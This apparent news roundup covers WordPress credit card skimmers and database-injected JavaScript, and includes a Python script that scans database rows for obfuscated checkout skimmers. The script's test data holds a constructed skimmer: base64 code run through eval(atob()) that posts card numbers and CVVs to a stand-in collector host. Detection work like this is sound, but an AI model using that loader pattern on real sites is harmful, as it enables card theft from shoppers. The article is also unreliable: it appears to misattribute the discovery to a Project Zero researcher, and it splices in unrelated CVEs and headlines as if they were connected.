WordPress Skimmers Evade Detection by Injecting Themselves into Database Tables

WordPress Credit Card Skimmer Malware

A new strain of credit card skimming malware targeting WordPress checkout pages has recently emerged and is a significant threat in the current cybersecurity landscape.

  • Malware Details: This malware has been identified by Natalie Silvanovich, a security researcher at Google’s Project Zero team. It is designed to intercept and steal credit card information from WordPress checkout pages, exploiting vulnerabilities in the e-commerce platforms.
  • Impact: The malware can capture sensitive financial information, including credit card numbers, expiration dates, and CVV codes, posing a severe risk to online shoppers and e-commerce businesses.
  • Mitigation: To protect against this malware, website administrators are advised to update their WordPress plugins and themes to the latest versions, implement robust security measures such as Web Application Firewalls (WAFs), and regularly monitor their websites for suspicious activity.

E-commerce JavaScript Infections

E-commerce platforms are increasingly being targeted by JavaScript-based malware, which can lead to various types of infections and data theft.

  • JavaScript Skimmers: These malware variants inject malicious JavaScript code into the checkout pages of e-commerce websites. This code can skim credit card details and other sensitive information, often without the knowledge of the website owners or users.
  • Exploitation Methods: The attackers often exploit vulnerabilities in third-party libraries or plugins used by the e-commerce platforms. Phishing campaigns and compromised developer accounts can also be used to inject the malicious code.
  • Examples: Recent reports have highlighted the use of YouTube URLs combined with phishing tactics to distribute malware, further complicating the security landscape for e-commerce sites.
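The monitoring the mitigation bullets call for can be partly automated. The following Python script is an added example, not code from the original article or from any researcher named in it: it scans content pulled from a site's database tables for stored inline scripts that use obfuscation helpers or reference checkout fields, and it decodes long base64 runs so that terms hidden inside an `atob()` payload are caught too. The sample rows, term lists and alert threshold are constructed assumptions.

```python
import base64
import re

# Indicators for content from WordPress database tables; term lists and threshold are assumptions.
SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
OBFUSCATION = ("atob(", "eval(", "String.fromCharCode", "unescape(")
CHECKOUT_TERMS = ("checkout", "card", "cvv", "cvc", "expir", "billing")

def scan_row(name, value):
    """Score one stored value; returns (score, reasons), score 0 when no script."""
    scripts = SCRIPT_RE.findall(value)
    if not scripts:
        return 0, []
    reasons = ["inline <script> stored in database row " + name]
    body = " ".join(scripts)
    hits = [f for f in OBFUSCATION if f in body]
    if hits:
        reasons.append("obfuscation helpers: " + ", ".join(hits))
    clear = B64_RE.sub(" ", body).lower()  # script text with base64 blobs masked out
    visible = [t for t in CHECKOUT_TERMS if t in clear]
    decoded = ""
    for blob in B64_RE.findall(body):
        try:
            decoded += base64.b64decode(blob, validate=True).decode("utf-8", "ignore").lower()
        except ValueError:  # binascii.Error: a long token that is not real base64
            pass
    hidden = [t for t in CHECKOUT_TERMS if t in decoded and t not in visible]
    if visible:
        reasons.append("checkout terms in script: " + ", ".join(visible))
    if hidden:
        reasons.append("checkout terms only inside base64 payload: " + ", ".join(hidden))
    return len(reasons), reasons

def scan_rows(rows, threshold=2):
    """Return (score, name, reasons) for rows with at least `threshold` indicators."""
    scored = [(s, n, r) for n, v in rows for s, r in [scan_row(n, v)] if s >= threshold]
    return sorted(scored, reverse=True)

# Constructed sample rows (not real malware): a plain option, a benign analytics
# snippet, and an injected loader whose card-reading code is base64 inside atob().
EXFIL_JS = (b'fetch("https://collector.invalid/p",{method:"POST",body:JSON.stringify({'
            b'card:document.querySelector("#card_number").value,cvv:document.querySelector("#card_cvv").value})})')
SAMPLE_ROWS = [
    ("blogname", "Example Shop"),
    ("analytics_snippet", "<script>window.dataLayer=window.dataLayer||[];</script>"),
    ("widget_html", '<script>if(location.href.indexOf("checkout")>-1){eval(atob("'
                    + base64.b64encode(EXFIL_JS).decode() + '"))}</script>'),
]
```

Against the sample rows, only `widget_html` crosses the threshold; the analytics snippet scores a single indicator and is not reported, which is the false-positive behaviour a practitioner wants before pointing this at a real table dump.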

Database Table Skimming Techniques

Database table skimming involves the theft of sensitive data directly from the databases of e-commerce platforms.

  • Techniques: Attackers may use SQL injection vulnerabilities or exploit weak database credentials to gain access to the database tables. Once inside, they can extract sensitive information such as credit card numbers, customer details, and other valuable data.
  • Vulnerabilities: Critical vulnerabilities like those identified in Aviatrix Controller (CVE-2024-50603) and GFI KerioControl firewalls (CVE-2024-52875) can provide entry points for attackers to access and skim database tables.
  • Mitigation: Ensuring that databases are properly secured with strong passwords, regular updates, and robust access controls is crucial. Implementing Web Application Firewalls (WAFs) and conducting regular security audits can also help in preventing such attacks.

Additional Considerations

  • Zero-Day Exploits: The recent exploitation of a zero-day vulnerability in Ivanti Connect Secure VPN by Chinese hackers highlights the urgency of keeping software up to date and patching known vulnerabilities promptly.
  • Advanced Threats: Sophisticated cyber-espionage operations, such as those conducted by the RedDelta and RedCurl APT groups, also target e-commerce platforms and databases, emphasizing the need for advanced security measures and continuous monitoring.

In summary, the latest news indicates a heightened risk of credit card skimming malware, JavaScript infections, and database table skimming techniques targeting e-commerce platforms. Staying updated with the latest security patches, implementing robust security measures, and continuously monitoring for suspicious activities are essential to mitigate these threats.